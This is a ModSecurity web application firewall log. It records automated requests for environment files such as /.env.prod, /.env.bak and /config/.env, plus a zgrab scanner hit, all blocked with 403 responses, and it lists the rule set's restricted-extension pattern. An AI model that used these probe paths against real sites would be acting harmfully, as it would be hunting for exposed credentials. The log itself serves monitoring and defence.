[Mon Aug 04 15:56:18.317560 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aJC8Ajd0OZGgr9fy1N49DwAAAAg"]
[Mon Aug 04 15:56:18.340449 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aJC8Ajd0OZGgr9fy1N49EAAAAAg"]
[Mon Aug 04 15:56:18.340666 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aJC8Ajd0OZGgr9fy1N49EAAAAAg"]
[Mon Aug 04 15:56:18.340864 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aJC8Ajd0OZGgr9fy1N49EAAAAAg"]
[Mon Aug 04 15:56:18.362963 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aJC8Ajd0OZGgr9fy1N49EQAAAAg"]
[Mon Aug 04 15:56:18.363166 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aJC8Ajd0OZGgr9fy1N49EQAAAAg"]
[Mon Aug 04 15:56:18.363320 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aJC8Ajd0OZGgr9fy1N49EQAAAAg"]
[Mon Aug 04 15:56:18.385413 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aJC8Ajd0OZGgr9fy1N49EgAAAAg"]
[Mon Aug 04 15:56:18.385626 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aJC8Ajd0OZGgr9fy1N49EgAAAAg"]
[Mon Aug 04 15:56:18.385780 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aJC8Ajd0OZGgr9fy1N49EgAAAAg"]
[Mon Aug 04 15:56:18.407958 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aJC8Ajd0OZGgr9fy1N49EwAAAAg"]
[Mon Aug 04 15:56:18.408152 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aJC8Ajd0OZGgr9fy1N49EwAAAAg"]
[Mon Aug 04 15:56:18.408320 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aJC8Ajd0OZGgr9fy1N49EwAAAAg"]
[Mon Aug 04 15:56:18.430386 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aJC8Ajd0OZGgr9fy1N49FAAAAAg"]
[Mon Aug 04 15:56:18.430583 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aJC8Ajd0OZGgr9fy1N49FAAAAAg"]
[Mon Aug 04 15:56:18.430778 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aJC8Ajd0OZGgr9fy1N49FAAAAAg"]
[Mon Aug 04 15:56:18.452918 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aJC8Ajd0OZGgr9fy1N49FQAAAAg"]
[Mon Aug 04 15:56:18.453059 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aJC8Ajd0OZGgr9fy1N49FQAAAAg"]
[Mon Aug 04 15:56:18.453274 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aJC8Ajd0OZGgr9fy1N49FQAAAAg"]
[Mon Aug 04 15:56:18.453431 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aJC8Ajd0OZGgr9fy1N49FQAAAAg"]
[Mon Aug 04 15:56:18.475559 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aJC8Ajd0OZGgr9fy1N49FgAAAAg"]
[Mon Aug 04 15:56:18.475729 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aJC8Ajd0OZGgr9fy1N49FgAAAAg"]
[Mon Aug 04 15:56:18.475960 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aJC8Ajd0OZGgr9fy1N49FgAAAAg"]
[Mon Aug 04 15:56:18.476120 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aJC8Ajd0OZGgr9fy1N49FgAAAAg"]
[Mon Aug 04 15:56:18.498261 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.testing"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.testing"] [unique_id "aJC8Ajd0OZGgr9fy1N49FwAAAAg"]
[Mon Aug 04 15:56:18.498489 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.testing"] [unique_id "aJC8Ajd0OZGgr9fy1N49FwAAAAg"]
[Mon Aug 04 15:56:18.498658 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.testing"] [unique_id "aJC8Ajd0OZGgr9fy1N49FwAAAAg"]
[Mon Aug 04 15:56:18.521185 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.*.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.*.local"] [unique_id "aJC8Ajd0OZGgr9fy1N49GAAAAAg"]
[Mon Aug 04 15:56:18.521479 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.*.local"] [unique_id "aJC8Ajd0OZGgr9fy1N49GAAAAAg"]
[Mon Aug 04 15:56:18.521695 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.*.local"] [unique_id "aJC8Ajd0OZGgr9fy1N49GAAAAAg"]
[Mon Aug 04 15:56:18.543852 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aJC8Ajd0OZGgr9fy1N49GQAAAAg"]
[Mon Aug 04 15:56:18.544059 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aJC8Ajd0OZGgr9fy1N49GQAAAAg"]
[Mon Aug 04 15:56:18.544212 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aJC8Ajd0OZGgr9fy1N49GQAAAAg"]
[Tue Aug 05 02:53:02.550622 2025] [:error] [pid 1712559] [client 3.140.182.19:56111] [client 3.140.182.19] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aJFV7hGOfMCdrRfjifTwcQAAAAA"]
[Tue Aug 05 02:53:02.551068 2025] [:error] [pid 1712559] [client 3.140.182.19:56111] [client 3.140.182.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aJFV7hGOfMCdrRfjifTwcQAAAAA"]
[Tue Aug 05 02:53:02.551245 2025] [:error] [pid 1712559] [client 3.140.182.19:56111] [client 3.140.182.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aJFV7hGOfMCdrRfjifTwcQAAAAA"]
[Wed Aug 06 00:40:59.328462 2025] [:error] [pid 1737085] [client 217.217.252.16:53353] [client 217.217.252.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJKIexEhtmJ5esit6iHTcAAAAAg"]
[Wed Aug 06 00:40:59.328746 2025] [:error] [pid 1737085] [client 217.217.252.16:53353] [client 217.217.252.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJKIexEhtmJ5esit6iHTcAAAAAg"]
